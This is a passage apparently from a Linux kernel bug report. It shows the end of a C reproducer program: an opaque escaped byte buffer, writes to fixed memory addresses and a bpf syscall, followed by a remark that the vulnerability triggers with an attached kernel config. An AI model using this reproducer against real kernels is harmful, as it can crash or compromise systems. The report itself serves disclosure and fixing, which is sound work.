x8f\x5d\xec\x9f\x9c\xbf\x2c\xdb\x3c\xfc\xb3\x8d\xe2\x15\x48\xac\xff\xdd\xf2\x44\x22\xb6\xd8\xd9\x13\xc7\x4a\xd7\x69\x70\xd1\xd6\x6e\x3f\x0a\x26\x60\x24\x0d\x26\xea\x59\xdf\x42\x9e\x07\x80\xe5\xa8\x5e\xe3\xff\x36\x68\xbe\xce\xeb\x4a\x48\x57\x06\x9c\x9d\x8e\x0e\x64\xe5\xc2\x80\x99\xdb\x2c\x35\xea\x4f\x51\x2c\xc2\xd0\xde\x11\x46\x32\x5d\x81\xdd\x1b\xc9\xdc\x73\xc6\xa4\x98\xd2\xee\xef\xe4\xb4\x1a\x0e\x68\xdd\xe8\xad\x6b\xeb\x8e\x90\x6d\x69\xf0\x3f\x1f\x22\x2e\x4f\x5f\x9d\xa6\x71\x01\xde\x62\xab\xf9\xcb\x87\xd8\xd8\x2f\xf2\x9a\x5c\x86\x8c\x4f\xeb\x66\x55\x8d\x54\x5b\x7c\xb9\xf1\x30\xe4\xcd\x51\xbc\xbb\x1b\x05\x5a\x13\xc8\xcd\xe1\x85\x21\xe8\xf7\x28\x02\xb8\x60\x03\xd4\x09\x59\x03\x56\x14\x97\x6f\xb3\xad\x2f\xf3\x10\x4b\xd7\x86\xd9\xfc\x07\x8d\x56\x93\x3b\xf9\x94\x95\x2e\x1a\x6e\x21\xcd\xc0\x9c\x08\xa9\x3a\x3a\x2b\xcd\xa0\x8c\x0f\xb6\x16\x3d\x38\x2b\xb1\xd6\x16\xd4\xe5\xf9\x3d\x03\x58\xd8\x26\x1e\xfd\x41\x32\xde\x52\xbe\xda\x7e\x44\x1b\x72\xa9\xb5\xaa\x94\x6c\xe1\xe3\x3f\x20\x53\xa4\x48\x03\x02\x0b\xf9\x34\xe0\x43\x33\x51\x5e\x42\xd0\xd1\x6e\x17\x89\x97\x00\xa7\x0c\x08\xfe\x5f\x78\xca\xcc\xcb\xec\xd0\xb8\xae\xdd\x95\xae\x3c\xa9\xe4\xa4\x3d\xc4\x79\x81\xfd\x50\xd7\x55\x77\xea\x9d\xe5\x32\x72\xb8\xbc\xe5\xc2\x99\x18\x09\xce\x78\x5f\x46\x75\xce\x4b\xde\x07\x0d\xf7\xf9\x53\xc4\xa0\x1c\x67\xb9\x2f\xb8\x8a\x16\x73\x91\x48\x0e\x0a\x9e\x34\x00\x13\xc9\x1b\x49\xf7\x91\x8f\xc5\xf2\x0b\x89\xe8\x22\x38\x23\x4c\xb8\xea\x71\x2b\x95\xae\x32\xb6\x74\xf6\x98\x64\xe0\x47\xc0\xd6\xbe\x0b\x54\x42\x68\x21\xb1\x50\x09\xf5\xb0\x3c\x9d\x07\x81\xa6\xd0\x35\x24\x98\x14\x49\x37\xa2\xa9\x2b\xcd\x21\xdd\x3d\x25\x05\xf8\xbe\xc2\x34\xcc\xf7\xf5\x58\x7c\x7f\xb7\x2f\xbb\xfd\xb2\x2f\xec\xef\x06\xe7\x83\xc7\x38\x36\x2a\xba\x2e\x7a\xb3\x6d\xab\xb1\xfa\x29\xf4\xbd\x3d\xdd\x82\x5e\xd0\x1f\xf8\xaa\xec\xe8\x57\xc9\x01\xd5\xa0\xcc\xf1\x41\x3c\x83\x7c\xa0\xef\x7f\xd5\x08\x77\x10\x15\x2a\x4b\xc4\x13\xfd\xb1\x55\x1e\xd5\x52\x58\x58\xc2\xed\x5d\xfd\x2b\x77\xf3\x83\xf1\x49\x21\x35\x4b\x97\xf0\x6c\xb2\x4b\x3d\xea\x8d\x8f\x5d\xe4\x70\x6f\x01\x1b\x6c\xcc\x63\x2c\x07\x88\xf6\x26\xb4\xd2\x7a\x62\x82\x6a\xfb\x42\xe9\x46\x68\x53\x11\x6b\xef\x4a\x73\x19\x7b\xe2\x92\xa4\x64\x8e\xa9\x4e\x87\xc1\x6d\x50\x3b\x1c\x85\x86\xfe\xe5\x43\x59\xdf\x0f\x7f\xcc\x43\x3c\x27\x35\x46\x44\x97\xfc\xe8\xeb\xf2\x33\xc8\x22\x81\x94\xf2\xfd\x25\xc4\x31\xb6\x42\x2a\xc2\x74\x49\x0e\x3b\x83\xe6\x02\x4f\x9f\x54\x37\xee\x62\x66\xa1\xde\x16\x4a\x94\x54\xd9\x78\xa6\xf8\x5d\x99\xfb\x20\xa0\xaf\x89\x48\x25\x34\x8d\x42\x53\xd4\x21\xd2\x94\x22\x16\x16\x90\xdb\xa1\x49\x04\xa8\x76\x7c\x8e\xde\x67\x6a\x3b\x4e\x86\xcb\xfc\x1f\x30\x61\x68\x53\x7b\x91\x93\xa8\xfd\x31\x21\x45\x65\x64\xa6\x07\x9e\xe2\x67\xff\x93\x80\xfa\xb0\xc8\x6b\xaf\xeb\xa2\x0b\xc8\x79\x58\x9e\x60\x01\xe1\x45\xaa\xa8\x41\x87\x0d\xcd\x43\xe5\x8c\x6e\xcd\x22\xb0\x5f\x3b\xff\xda\xc2\x8d\x1c\x69\x98\x21\xc5\xbf\x63\x07\xdd\x6b\xa8\xc8\x11\xee\x3e\x88\xe9\xe9\x0c\x0b\x86\x18\x61\x73\x47\x3e\xf3\x1f\x9f\x2f\x76\x6c\x76\x58\xae\x38\x69\xab\x72\xb0\xd8\x13\xfe\x64\x06\xe3\x72\x30\xcf\x11\x49\xf2\xd2\x2b\x4f\xe7\x33\x0f\x89\x4c\x5c\xe9\x02\x2c\x1c\x11\x54\xa9\x73\x3f\xa2\xee\x93\x32\xee\xca\x72\x57\x30\x04\x3b\x17\xda\x37\x7c\x07\x72\x8b\x58\x53\x5e\x89\xf8\x52\xd6\x24\x40\xfc\xe9\x3f\x85\x5e\x6c\x41\xd9\x18\xeb\x3c\xde\x9e\xb9\x76\xef\x14\xd0\x23\x67\x79\x54\xb1\x38\xd5\xfb\x17\x3f\xd9\x4d\x82\x24\x1b\x63\x45\x32\x88\x76\x76\x4e\xa7\xc6\x71\x78\xe3\x94\x2a\x49\x9d\x92\x92\xa6\x15\xf5\x62\x7d\x66\xbc\x4c\x10\x46\x7d\x1a\xe2\x93\xd2\xa5\x96\x31\x32\x37\x10\xf5\xa0\xe1\x94\xfb\xe5\x80\xa4\x58\xd5\x64\xc8\xec\x8c\x80\x41\xf7\x02\xca\x3c\x7e\xfd\xb9\xc5\x10\x59\x9b\x97\x13\xe0\xb2\xf7\xc1\xef\x46\x5b\xae\x00\x96\x24\x4f\xfd\xe8\x9e\xd5\xcb\x97\x8f\xa8\xde\x22\xc7\x70\x9a\xb5\xf4\x2a\x74\x09\x06\x80\x0d\xc1\xce\x9a\xf2\x16\x06\x12\x42\xbf\xd3\x0a\xe4\xeb\xb5\xd5\xe3\xc3\x4f\x30\xef\xc7\xd4\x50\x33\x91\x64\xc0\x31\x19\xfb\xcf\xfe\x99\x62\xd0\xe2\x16\xb0\xf6\x73\x27\x6d\x64\x2a\x6e\xdf\xd1\x13\xa5\x70\xfe\x1d\xf9\xd2\x06\x9e\x7a\x25\xf0\x6b\xb3\xdb\xbb\x3c\xf9\x87\x90\x76\x96\xc9\xcb\xfd\x97\x4a\xb3\x7d\xb4\x31\x28\x6e\xa6\x7d\xcf\x08\x57\xe0\x86\x9a\xa2\xeb\xcc\xc3\x78\xdf\xc2\x32\x36\x6b\xfa\x48\xbf\x76\x17\x18\x7d\xe0\x8a\xbd\x05\xa4\x9d\x34\x5f\x2b\x70\xb5\x4c\x9a\x92\x50\xda\xf0\x23\x6e\xa3\x39\x52\xa8\x3f\x7d\x99\x90\xe2\x06\x99\x41\x55\xfa\x48\x74\xfa\x55\xaf\xa9\x30\x54\xd7\xca\x41\x5a\xb3\xf1\x11\xce\xb1\x01\x2e\x21\x92\xf1\x48\x35\x2a\x1e\x1c\x4c\x8a\x70\x3e\xef\xd7\x66\xa0\x30\xc0\x17\xd4\x5a\xbf\x17\xc7\x8c\xe5\xb0\xf8\x57\x51\x25\x89\xb9\x5a\xe7\x6f\xc4\xff\xd1\xb7\x8f\xfa\x8d\xe5\x6e\xf3\xfe\xc2\xf0\x09\x4a\xae\x1a\xa2\x99\x05\x6f\x3d\x4a\x6c\x41\x11\xa9\x10\x81\x4d\x72\x8b\x65\x84\x51\xe2\xd9\xbb\x4b\x40\xf5\xec\x45\xa0\xdf\x2e\x0f\xc9\x9d\xe9\xf5\xb8\x69\xdd\x43\xf2\x94\x4a\x14\x2f\x9e\xe1\x00\x8d\x0c\xd8\xb7\x19\xa6\xad\x72\xea\x54\x48\x61\x63\x6c\x6c\x22\xec\xd8\x18\x2e\x46\xef\x7f\xb8\x3b\x1c\x6d\x05\x04\x8b\x65\x5e\x2c\xe8\x84\xbd\x32\x1a\xa8\x72\x06\x25\x86\xd6\x47\xa9\xd7\x71\x48\x9e\x0b\x46\x5e\xa4\x8e\x5e\xdd\x62\xbc\xea\xf6\x6b\xfe\x01\x75\x0d\xc3\x79\xae\x8c\x7b\x04\xd0\x9b\x6a\x56\xd0\x59\xe3\x59\x1e\x60\x87\x24\xf6\x90\x7a\x93\x68\x47\x35\x56\x88\x7c\xaa\x80\x0d\x06\x7f\xb1\x4d\x01\x89\xc7\x21\xaf\xb9\x0f\xa9\x05\x4d\x8f\x54\xe6\xcb\x36\x48\x9a\x39\xa4\x35\xe7\x78\xac\x83\xc5\x07\xa4\x11\xca\xd4\x39\xc6\x3a\xd8\x1a\x39\xc4\xfd\x2e\xf4\xbc\x9a\xc5\xef\x7d\x70\xb8\x2f\x11\x7c\x05\xb8\xae\xa8\x81\xde\xa6\xc7\x60\x81\x43\x53\x3b\xd0\x24\xcd\xe4\xc0\x23\x18\xa4\xd4\x59\x71\x7a\x24\x58\xbe\x76\x7b\x06\x4f\xb7\x8c\x50\x43\x81\xda\xe0\xd2\xae\xab\x07\x48\x89\x8a\x1f\xbc\xe9\xeb\x0f\x32\x88\xa2\x91\x2b\xe6\x3f\xc2\x23\x89\xca\x09\x66\x1e\xcd\xe2\x58\x33\x83\x20\x5c\x4a\x24\xc6\x06\xdf\x78\xa4\x28\xb4\x3a\x80\x12\x35\x10\x8a\xd5\xff\xab\x61\x61\x9b\x90\xbb\x27\x3e\x70\x5c\x58\x32\x78\x28\x56\xa4\x5d\x71\x64\x5a\x6d\x9c\xfd\x07\x8d\x90\x26\xdc\xba\x44\x94\x44\x7d\xf4\xc9\x25\xc8\x60\x23\xc8\x54\x7e\x27\xee\xf7\x95\x9f\xa4\x32\xe1\x78\xfa\xc3\x42\xd5\x00\x5d\x93\xf2\xd1\xcd\xf1\x18\xe5\x9f\x23\xea\x4e\xfa\xb0\x18\x62\x37\x16\x7f\x21\x6e\x5a\x8a\x89\x68\x0a\x8e\x52\xa2\x0d\xa5\x24\x82\x2c\x60\xa5", 1896);
*(uint64_t*)0x200000003a18 = 0;
*(uint32_t*)0x200000003a20 = 4;
*(uint32_t*)0x200000003a24 = 0x8462e620;
*(uint32_t*)0x200000003a28 = 0;
*(uint32_t*)0x200000003a2c = 0;
*(uint64_t*)0x200000003a30 = 0;
*(uint64_t*)0x200000003a38 = 0;
*(uint32_t*)0x200000003a40 = 0;
*(uint32_t*)0x200000003a44 = 0;
*(uint32_t*)0x200000003a48 = 0;
syscall(__NR_bpf, /*cmd=*/0xaul, /*arg=*/0x200000003a00ul, /*size=*/0x50ul);
return 0;
}

```

## Kernel Configuration Requirements for Reproduction

The vulnerability can be triggered with the kernel config in the attachment.